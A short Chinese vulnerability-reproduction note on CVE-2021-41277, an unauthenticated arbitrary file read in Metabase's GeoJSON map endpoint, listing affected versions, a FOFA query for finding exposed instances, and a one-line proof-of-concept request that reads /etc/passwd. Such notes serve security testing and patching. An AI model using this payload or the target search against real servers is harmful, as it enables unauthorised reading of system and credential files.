# Metabase geojson 任意文件读取漏洞 CVE-2021-41277

## 漏洞描述

在受影响的版本中，自定义 GeoJSON 地图（admin->settings->maps->custom maps->add a map）操作缺少权限验证，攻击者可通过该漏洞获得敏感信息

## 漏洞影响

```
metabase version < 0.40.5
metabase version >= 1.0.0, < 1.40.5
```

## FOFA

```
app="metabase"
```

## 漏洞复现

登录页面

![image-20220524152541900](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241525945.png)

验证POC

```
/api/geojson?url=file:/etc/passwd
```

![image-20220524152721994](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241527087.png)